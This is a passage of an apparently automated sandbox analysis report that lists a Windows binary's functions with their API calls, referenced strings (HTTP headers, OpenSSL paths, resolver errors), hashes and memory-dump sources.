                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 0123456789abcdefghijklmnopqrstuvwxyz$I32$I64
                                                                                                                                                • API String ID: 0-3086653229
                                                                                                                                                • Opcode ID: 48ac57508b9e6c6deee61415100b860767e301385a944e8f77466340bdccf7cd
                                                                                                                                                • Instruction ID: 8fba09a66a334d1046ffd444c0243137d4f7dc4b3e43463888c95a80690acd47
                                                                                                                                                • Opcode Fuzzy Hash: 48ac57508b9e6c6deee61415100b860767e301385a944e8f77466340bdccf7cd
                                                                                                                                                • Instruction Fuzzy Hash: 2ED125B09082059FDF298F68C9843FDBFA4EB91345F38446BD8029A351E27D9A42C779
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00409244, Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 00409249
                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00409257
                                                                                                                                                • int.LIBCPMT ref: 0040926B
                                                                                                                                                  • Part of subcall function 00409863: std::_Lockit::_Lockit.LIBCPMT ref: 00409874
                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 00409274
                                                                                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 004092B4
                                                                                                                                                • std::locale::facet::facet_Register.LIBCPMT ref: 004092BA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LockitLockit::_std::_$GetfacetH_prologIncrefRegisterstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2848266727-0
                                                                                                                                                • Opcode ID: 23762ea35e17f83e5c552cc9c37cbfe370356b100d98c109c67e083404f261ee
                                                                                                                                                • Instruction ID: 5043784a341471ba4da959a1efb30117f5b4d039450a2b1e4c6d649368ed0357
                                                                                                                                                • Opcode Fuzzy Hash: 23762ea35e17f83e5c552cc9c37cbfe370356b100d98c109c67e083404f261ee
                                                                                                                                                • Instruction Fuzzy Hash: DA010876D11110ABCB15F7B58805BAF76659B81728F10486FE501B73C2DFBC8E00C7A8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004092DC, Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 004092E1
                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004092EF
                                                                                                                                                • int.LIBCPMT ref: 00409303
                                                                                                                                                  • Part of subcall function 00409863: std::_Lockit::_Lockit.LIBCPMT ref: 00409874
                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0040930C
                                                                                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 0040934C
                                                                                                                                                • std::locale::facet::facet_Register.LIBCPMT ref: 00409352
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LockitLockit::_std::_$GetfacetH_prologIncrefRegisterstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2848266727-0
                                                                                                                                                • Opcode ID: 1e0163ef9d3a86da92d0a39292cea92f8fcaea656e645db185ef67a431ae8b70
                                                                                                                                                • Instruction ID: 452a4e61c8eeeaf4e7bda13df7f9f7fe56f98771c523bc610969419e47b73206
                                                                                                                                                • Opcode Fuzzy Hash: 1e0163ef9d3a86da92d0a39292cea92f8fcaea656e645db185ef67a431ae8b70
                                                                                                                                                • Instruction Fuzzy Hash: A5012632D11214A7CB15F7758815BEF77659B98724F10843FA901B73C2CFB88E408BA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041A0D1, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 267COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041A0D6
                                                                                                                                                  • Part of subcall function 00405CD7: __EH_prolog.LIBCMT ref: 00405CDC
                                                                                                                                                  • Part of subcall function 0048E466: __lock.LIBCMT ref: 0048E484
                                                                                                                                                  • Part of subcall function 0048E466: ___sbh_find_block.LIBCMT ref: 0048E48F
                                                                                                                                                  • Part of subcall function 0048E466: ___sbh_free_block.LIBCMT ref: 0048E49E
                                                                                                                                                  • Part of subcall function 0048E466: HeapFree.KERNEL32(00000000,00000001,004FFCB0,0000000C,00499E1C,00000000,00500298,0000000C,00499E54,00000001,?,?,0048F0A4,00000004,004FFD30,0000000C), ref: 0048E4CE
                                                                                                                                                  • Part of subcall function 0048E466: GetLastError.KERNEL32(?,0048F0A4,00000004,004FFD30,0000000C,00499516,00000000,00000000,00000000,00000000,00000000,0049AF7A,00000001,00000214), ref: 0048E4DF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock
                                                                                                                                                • String ID: Accept: */*$Content-Type: application/octet-stream$User-Agent: Mozilla/4.0$|P
                                                                                                                                                • API String ID: 464301166-4034774671
                                                                                                                                                • Opcode ID: 7337e8693bb96f069e2e79f5ff6619a1613c970956e0d84039c88d998df1931e
                                                                                                                                                • Instruction ID: 4bf59cb0fc79dd3851a5fa270df984cab4f9c93f93970c299ee4cb5a4f327154
                                                                                                                                                • Opcode Fuzzy Hash: 7337e8693bb96f069e2e79f5ff6619a1613c970956e0d84039c88d998df1931e
                                                                                                                                                • Instruction Fuzzy Hash: 7D918371D01109ABCF10AFA5DC81ADEB7B5EF15318F24442FF508A7282D7389A948B9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040C079, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 184COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog
                                                                                                                                                • String ID: <?xml$encoding$standalone$version
                                                                                                                                                • API String ID: 3519838083-3104461930
                                                                                                                                                • Opcode ID: e1b05c928d83795cb652359756639be448774c991ad85cd97e1bdca898154a39
                                                                                                                                                • Instruction ID: 2258cf4d849ae44b5bf630d7963306d98d0b461547a494992f80259597af88af
                                                                                                                                                • Opcode Fuzzy Hash: e1b05c928d83795cb652359756639be448774c991ad85cd97e1bdca898154a39
                                                                                                                                                • Instruction Fuzzy Hash: 95519D31A00308DBDF14EFA48881AAE7769AF45358F14426FF905772C2DB799C52CB9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041658F, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 184stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 00416594
                                                                                                                                                • _strlen.LIBCMT ref: 00416608
                                                                                                                                                • _memset.LIBCMT ref: 0041668D
                                                                                                                                                  • Part of subcall function 0048E466: __lock.LIBCMT ref: 0048E484
                                                                                                                                                  • Part of subcall function 0048E466: ___sbh_find_block.LIBCMT ref: 0048E48F
                                                                                                                                                  • Part of subcall function 0048E466: ___sbh_free_block.LIBCMT ref: 0048E49E
                                                                                                                                                  • Part of subcall function 0048E466: HeapFree.KERNEL32(00000000,00000001,004FFCB0,0000000C,00499E1C,00000000,00500298,0000000C,00499E54,00000001,?,?,0048F0A4,00000004,004FFD30,0000000C), ref: 0048E4CE
                                                                                                                                                  • Part of subcall function 0048E466: GetLastError.KERNEL32(?,0048F0A4,00000004,004FFD30,0000000C,00499516,00000000,00000000,00000000,00000000,00000000,0049AF7A,00000001,00000214), ref: 0048E4DF
                                                                                                                                                • lstrlenA.KERNEL32(?,00000000), ref: 00416727
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorFreeH_prologHeapLast___sbh_find_block___sbh_free_block__lock_memset_strlenlstrlen
                                                                                                                                                • String ID: |P
                                                                                                                                                • API String ID: 3244084352-2149487505
                                                                                                                                                • Opcode ID: f7389c9f386a0a9a3d822dadc89e323cceae152a326e855a94f2cc3289318d61
                                                                                                                                                • Instruction ID: a7d56ad7aa5f8079aea8a59c918f6686988215481b4cf93ae64ad073ead828d0
                                                                                                                                                • Opcode Fuzzy Hash: f7389c9f386a0a9a3d822dadc89e323cceae152a326e855a94f2cc3289318d61
                                                                                                                                                • Instruction Fuzzy Hash: 2151C1319001199BCF10EFA9CC45AEEB7B5FF45308F15452BE425F3291DB3899868B68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00418C80, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 180COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 00418C85
                                                                                                                                                  • Part of subcall function 0040E8C0: __EH_prolog.LIBCMT ref: 0040E8C5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog
                                                                                                                                                • String ID: Accept: */*$Content-Type: application/octet-stream$User-Agent: Mozilla/4.0$|P
                                                                                                                                                • API String ID: 3519838083-4034774671
                                                                                                                                                • Opcode ID: 2f767b29a77a4ee4541d6a3b1de1078e8f295ca33c1d53f8d5896643ef295631
                                                                                                                                                • Instruction ID: e65918c3c3da1d16f129a06aaf14bc247454c0d2b62a1db5c5a02e3f995a7bab
                                                                                                                                                • Opcode Fuzzy Hash: 2f767b29a77a4ee4541d6a3b1de1078e8f295ca33c1d53f8d5896643ef295631
                                                                                                                                                • Instruction Fuzzy Hash: 2551A572D00205AACF20BFA59CC2ADE77A5EF55718F14042FF604B7282DB7D4A858B99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0044F220, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 137COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strncmp
                                                                                                                                                • String ID: .\crypto\x509v3\v3_ncons.c$excluded$permitted
                                                                                                                                                • API String ID: 909875538-3320112686
                                                                                                                                                • Opcode ID: 195ed9672aaa2648b8ca5620b13c5614befbd895c8db58ae5f0cefb4a69b366a
                                                                                                                                                • Instruction ID: dbaea13cd6a2245a6be3c7912fa85323d76425108e49ca5c6abca80130d37a42
                                                                                                                                                • Opcode Fuzzy Hash: 195ed9672aaa2648b8ca5620b13c5614befbd895c8db58ae5f0cefb4a69b366a
                                                                                                                                                • Instruction Fuzzy Hash: 08411AB17403016BF720EA669C82F577385AB44708F44483FF94996383F67DD909876A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004025D0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 96stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004026E8: __EH_prolog.LIBCMT ref: 004026ED
                                                                                                                                                  • Part of subcall function 004026E8: lstrlenW.KERNEL32(?,00000000), ref: 00402710
                                                                                                                                                  • Part of subcall function 004026E8: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 0040272B
                                                                                                                                                • lstrcmpiW.KERNEL32(?,>%@,00000000,00000000,?,?,0040253E,?), ref: 0040262D
                                                                                                                                                • CoTaskMemFree.OLE32(>%@,>%@,00000000,00000000,?,?,0040253E,?), ref: 004026D9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeTask$H_prologlstrcmpilstrlen
                                                                                                                                                • String ID: >%@$>%@${
                                                                                                                                                • API String ID: 3556687524-2785201340
                                                                                                                                                • Opcode ID: 3a1eed4ea550ab0979526d03e14cf500c39b41bd9c10dafbe3e61bb5488a0f39
                                                                                                                                                • Instruction ID: cb22fa682044a0b8a455233af29240ddf0acd2e84249e8b2828f6101798ec0e9
                                                                                                                                                • Opcode Fuzzy Hash: 3a1eed4ea550ab0979526d03e14cf500c39b41bd9c10dafbe3e61bb5488a0f39
                                                                                                                                                • Instruction Fuzzy Hash: 0E319930B00318ABDB119F95C9C8A9D77B9FB44744F20487BE145B72D1D6FA5E81DB18
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004AC04E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 95COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004B863D: SetLastError.KERNEL32(0000273F,004B441F,00000002,004B4633,?,?,?,004B4633,?), ref: 004B864A
                                                                                                                                                • _memset.LIBCMT ref: 004AC09F
                                                                                                                                                • __fprintf_l.LIBCMT ref: 004AC0C2
                                                                                                                                                Strings
                                                                                                                                                • init_resolve_thread() failed for %s; %s, xrefs: 004AC0F4
                                                                                                                                                • getaddrinfo() failed for %s:%d; %s, xrefs: 004AC12B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast__fprintf_l_memset
                                                                                                                                                • String ID: getaddrinfo() failed for %s:%d; %s$init_resolve_thread() failed for %s; %s
                                                                                                                                                • API String ID: 3958027077-1389973398
                                                                                                                                                • Opcode ID: e2c89a2ed61aa86c23c5d24d00d97f05644d7580ee717e291fa7fe5426da74f3
                                                                                                                                                • Instruction ID: ecc0e3a67e87ea64e040c5bc6ba58bd30de5112e6adb10467326ce3e6e4e1ea2
                                                                                                                                                • Opcode Fuzzy Hash: e2c89a2ed61aa86c23c5d24d00d97f05644d7580ee717e291fa7fe5426da74f3
                                                                                                                                                • Instruction Fuzzy Hash: 18312DB1900209ABEB10EF95CC86FFF77BCEB45704F00041ABA05E2142DA79A9159BB9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00420D70, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _fprintf_memset
                                                                                                                                                • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                                                                • API String ID: 3021507156-3399676524
                                                                                                                                                • Opcode ID: f47943ab7ec7ef0ce9cfbab85241c927c8af33495254575ae37ba5854aa62ee2
                                                                                                                                                • Instruction ID: 12576a1e297fb4387a4174986c52f66acbc2612250227eaf0207ce6f48c3b90a
                                                                                                                                                • Opcode Fuzzy Hash: f47943ab7ec7ef0ce9cfbab85241c927c8af33495254575ae37ba5854aa62ee2
                                                                                                                                                • Instruction Fuzzy Hash: B2216D767003203BD220956A7C42F5B67DD8FC67ECF15491AFA44E7383E669EC0182AD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041AEF2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041AEF7
                                                                                                                                                • UuidCreate.RPCRT4(?), ref: 0041AF03
                                                                                                                                                • _memcmp.LIBCMT ref: 0041AF1E
                                                                                                                                                  • Part of subcall function 0040D892: __vsnprintf.LIBCMT ref: 0040D8C9
                                                                                                                                                  • Part of subcall function 00494870: __wcslwr_s_l.LIBCMT ref: 0049487A
                                                                                                                                                Strings
                                                                                                                                                • |P, xrefs: 0041AF35
                                                                                                                                                • %08X%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X, xrefs: 0041AF7F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateH_prologUuid__vsnprintf__wcslwr_s_l_memcmp
                                                                                                                                                • String ID: %08X%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X$|P
                                                                                                                                                • API String ID: 4222741402-841188695
                                                                                                                                                • Opcode ID: fbdb676eec1dd0142f57aacc8eafccdd5437f22481640e0f35ebd4723b190431
                                                                                                                                                • Instruction ID: 8a11516b30457b368084194ec27007a2eb60275358016bcffb795f12a85ef5e8
                                                                                                                                                • Opcode Fuzzy Hash: fbdb676eec1dd0142f57aacc8eafccdd5437f22481640e0f35ebd4723b190431
                                                                                                                                                • Instruction Fuzzy Hash: 6A2141B290405A6ECB51EBE98C05FBFBBFCAF09315F04446AF590E2182D73CD6059769
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004B8D2B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __fprintf_l_strlen
                                                                                                                                                • String ID: %s:%s$%sAuthorization: Basic %s$Proxy-
                                                                                                                                                • API String ID: 2029578563-2961970465
                                                                                                                                                • Opcode ID: 30344fbb6a2214b3c91a0b6080fcc8f56736a74280bfa550b6a5cac076dadabc
                                                                                                                                                • Instruction ID: 86f84c575a5d8a8a416ec196c639c8038a00268400fd4f475b295cd03a7d790a
                                                                                                                                                • Opcode Fuzzy Hash: 30344fbb6a2214b3c91a0b6080fcc8f56736a74280bfa550b6a5cac076dadabc
                                                                                                                                                • Instruction Fuzzy Hash: B621AE72500209AFDB00DB55CC46EFA77ACEF15314F2004BBF505AB292EB74AA04CB68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004BEF19, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 69COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
